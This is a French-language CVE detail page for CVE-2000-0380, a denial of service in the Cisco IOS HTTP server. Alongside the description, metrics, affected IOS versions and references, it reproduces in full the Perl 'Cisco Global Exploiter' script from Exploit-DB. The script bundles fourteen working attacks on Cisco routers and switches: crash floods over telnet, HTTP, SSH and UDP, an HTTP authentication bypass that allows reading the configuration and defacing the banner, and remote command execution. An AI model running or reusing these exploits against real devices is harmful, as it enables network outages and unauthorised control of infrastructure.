CVE-2000-0380 : Détail

CVE-2000-0380

A03-Injection
95.97%V3
Network
2000-07-12
02h00 +00:00
2009-03-01
23h00 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The IOS HTTP service in Cisco routers and switches running IOS 11.1 through 12.1 allows remote attackers to cause a denial of service by requesting a URL that contains a %% string.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.1 AV:N/AC:M/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 19882

Date de publication : 2000-04-25 22h00 +00:00
Auteur : Keith Woodworth
EDB Vérifié : Yes

#source: https://www.securityfocus.com/bid/1154/info # #A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash. # #!/usr/bin/perl ## # Cisco Global Exploiter # # Legal notes : # The BlackAngels staff refuse all responsabilities # for an incorrect or illegal use of this software # or for eventual damages to others systems. # # http://www.blackangels.it ## ## # Modules ## use Socket; use IO::Socket; ## # Main ## $host = ""; $expvuln = ""; $host = @ARGV[ 0 ]; $expvuln = @ARGV[ 1 ]; if ($host eq "") { usage(); } if ($expvuln eq "") { usage(); } if ($expvuln eq "1") { cisco1(); } elsif ($expvuln eq "2") { cisco2(); } elsif ($expvuln eq "3") { cisco3(); } elsif ($expvuln eq "4") { cisco4(); } elsif ($expvuln eq "5") { cisco5(); } elsif ($expvuln eq "6") { cisco6(); } elsif ($expvuln eq "7") { cisco7(); } elsif ($expvuln eq "8") { cisco8(); } elsif ($expvuln eq "9") { cisco9(); } elsif ($expvuln eq "10") { cisco10(); } elsif ($expvuln eq "11") { cisco11(); } elsif ($expvuln eq "12") { cisco12(); } elsif ($expvuln eq "13") { cisco13(); } elsif ($expvuln eq "14") { cisco14(); } else { printf "\nInvalid vulnerability number ...\n\n"; exit(1); } ## # Functions ## sub usage { printf "\nUsage :\n"; printf "perl cge.pl <target> <vulnerability number>\n\n"; printf "Vulnerabilities list :\n"; printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n"; printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n"; printf "[3] - Cisco IOS HTTP Auth Vulnerability\n"; printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n"; printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n"; printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n"; printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n"; printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n"; printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n"; printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n"; printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n"; exit(1); } sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability { my $serv = $host; my $dch = "?????????????????a~ %%%%%XX%%%%%"; my $num = 30000; my $string .= $dch x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("No telnet server detected on $serv ...\n\n"); $sockd->autoflush(1); print $sockd "$string". $shc; while (<$sockd>){ print } print("\nPacket sent ...\n"); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $serv, PeerPort => "(23)", ) || die("Vulnerability successful exploited. Target server is down ...\n\n"); print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco2 # Cisco IOS Router Denial of Service Vulnerability { my $serv = $host; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; $sockd->autoflush(1); print $sockd "GET /\%\% HTTP/1.0\n\n"; -close $sockd; print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco3 # Cisco IOS HTTP Auth Vulnerability { my $serv= $host; my $n=16; my $port=80; my $target = inet_aton($serv); my $fg = 0; LAB: while ($n<100) { my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n"); $n++; foreach $line (@results){ $line=~ tr/A-Z/a-z/; if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;} if ($line =~ /http\/1\.0 200 ok/) {$fg=0;} } if ($fg==1) { sleep(2); print "Vulnerability unsuccessful exploited ...\n\n"; } else { sleep(2); print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n"; last LAB; } sub exploit { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Unable to initialize socket ...\n\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("No http server detected on $serv ...\n\n"); } } } exit(1); } sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability { my $serv = $host; my $n = 16; while ($n <100) { exploit1("GET /level/$n/exec/- HTTP/1.0\n\n"); $wr =~ s/\n//g; if ($wr =~ /200 ok/) { while(1) { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n"; print "[1] Banner change\n"; print "[2] List vty 0 4 acl info\n"; print "[3] Other\n"; print "Enter a valid option [ 1 - 2 - 3 ] : "; $vuln = <STDIN>; chomp($vuln); if ($vuln == 1) { print "\nEnter deface line : "; $vuln = <STDIN>; chomp($vuln); exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n"); } elsif ($vuln == 2) { exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); print "$wrf"; } elsif ($vuln == 3) { print "\nEnter attack URL : "; $vuln = <STDIN>; chomp($vuln); exploit1("GET /$vuln HTTP/1.0\n\n"); print "$wrf"; } } } $wr = ""; $n++; } die "Vulnerability unsuccessful exploited ...\n\n"; sub exploit1 { my $sockd = IO::Socket::INET -> new ( Proto => 'tcp', PeerAddr => $serv, PeerPort => 80, Type => SOCK_STREAM, Timeout => 5); unless($sockd){die "No http server detected on $serv ...\n\n"} $sockd->autoflush(1); $sockd -> send($_[0]); while(<$sockd>){$wr .= $_} $wrf = $wr; close $sockd; } exit(1); } sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability { my $serv = $host; my $port = 22; my $vuln = "a%a%a%a%a%a%a%"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No ssh server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); exit(1); } sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET ? HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; close($sockd); exit(1); } sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability { my $serv = $host; my $port = 80; my $k = ""; print "Enter a file to read [ /show/config/cr set as default ] : "; $k = <STDIN>; chomp ($k); if ($k eq "") {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";} else {$vuln = "GET /exec$k HTTP/1.0\n\n";} my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET /error?/ HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability { my $ip = $host; my $port = "514"; my $ports = ""; my $size = ""; my $i = ""; my $string = "%%%%%XX%%%%%"; print "Input packets size : "; $size = <STDIN>; chomp($size); socket(SS, PF_INET, SOCK_DGRAM, 17); my $iaddr = inet_aton("$ip"); for ($i=0; $i<10000; $i++) { send(SS, $string, $size, sockaddr_in($port, $iaddr)); } printf "\nPackets sent ...\n"; sleep(2); printf "Please enter a server's open port : "; $ports = <STDIN>; chomp $ports; printf "\nNow checking server status ...\n"; sleep(2); socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; my $dest = sockaddr_in ($ports, inet_aton($ip)); connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n"; printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; exit(1); } sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability { my $ip = $host; my $vln = "%%%%%XX%%%%%"; my $num = 30000; my $string .= $vln x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ip, PeerPort => "(2002)", ) || die "Unable to connect to $ip:2002 ...\n\n"; $sockd->autoflush(1); print $sockd "$string" . $shc; while (<$sockd>){ print } print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$ip, PeerPort=>"(2002)",); unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); } sub cisco11 # Cisco Catalyst Memory Leak Vulnerability { my $serv = $host; my $rep = ""; my $str = "AAA\n"; print "\nInput the number of repetitions : "; $rep = <STDIN>; chomp $rep; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(23)", Proto => "tcp") || die "No telnet server detected on $serv ...\n\n"; for ($k=0; $k<=$rep; $k++) { print $sockd "$str"; sleep(1); print $sockd "$str"; sleep(1); } close($sockd); print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"(23)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n"; close($sockd2); exit(1); } sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability { my $serv = $host; my $l =100; my $vuln = ""; my $long = "A" x $l; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(80)", Proto => "tcp") || die "No http server detected on $serv ...\n\n"; for ($k=0; $k<=50; $k++) { my $vuln = "GET " . $long . " HTTP/1.0\n\n"; print $sockd "$vuln\n\n"; sleep(1); $l = $l + 100; } close($sockd); print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n"; close($sockd2); exit(1); } sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF) { my $serv = $host; my $vuln = "GET %u002F HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => "(80)", Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); sleep(1); print("Now checking server's status ...\n"); print("Please verify if directory has been listed ...\n\n"); print("Server response :\n"); sleep(2); while (<$sockd>){ print } exit(1); } sub cisco14 # Cisco IOS HTTP server DoS Vulnerability { my $serv = $host; my $vuln = "GET /TEST?/ HTTP/1.0"; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; print $sockd "$vuln\n\n"; print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); }

Products Mentioned

Configuraton 0

Cisco>>Ios >> Version 11.1

Cisco>>Ios >> Version 11.2

Cisco>>Ios >> Version 11.2\(4\)f1

Cisco>>Ios >> Version 11.2\(8\)

Cisco>>Ios >> Version 11.2\(8\)p

Cisco>>Ios >> Version 11.2\(9\)p

Cisco>>Ios >> Version 11.2\(9\)xa

Cisco>>Ios >> Version 11.2\(10\)

Cisco>>Ios >> Version 11.2\(10\)bc

Cisco>>Ios >> Version 11.2\(17\)

Cisco>>Ios >> Version 11.2p

Cisco>>Ios >> Version 11.3

Cisco>>Ios >> Version 11.3\(1\)

Cisco>>Ios >> Version 11.3\(1\)ed

Cisco>>Ios >> Version 11.3\(1\)t

Cisco>>Ios >> Version 11.3t

Cisco>>Ios >> Version 12.0

Cisco>>Ios >> Version 12.0\(1\)w

Cisco>>Ios >> Version 12.0\(1\)xa3

Cisco>>Ios >> Version 12.0\(1\)xb

Cisco>>Ios >> Version 12.0\(1\)xe

Cisco>>Ios >> Version 12.0\(2\)

Cisco>>Ios >> Version 12.0\(2\)xc

Cisco>>Ios >> Version 12.0\(2\)xd

Cisco>>Ios >> Version 12.0\(2\)xf

Cisco>>Ios >> Version 12.0\(2\)xg

Cisco>>Ios >> Version 12.0\(3\)t2

Cisco>>Ios >> Version 12.0\(4\)

Cisco>>Ios >> Version 12.0\(4\)s

Cisco>>Ios >> Version 12.0\(4\)t

Cisco>>Ios >> Version 12.0\(5\)

Cisco>>Ios >> Version 12.0\(5\)t1

Cisco>>Ios >> Version 12.0\(6\)

Cisco>>Ios >> Version 12.0\(7\)t

Cisco>>Ios >> Version 12.0\(8\)

Cisco>>Ios >> Version 12.0\(9\)s

Cisco>>Ios >> Version 12.0db

Cisco>>Ios >> Version 12.0s

Cisco>>Ios >> Version 12.0t

Références

http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml
Tags : vendor-advisory, x_refsource_CISCO
http://www.osvdb.org/1302
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/1154
Tags : vdb-entry, x_refsource_BID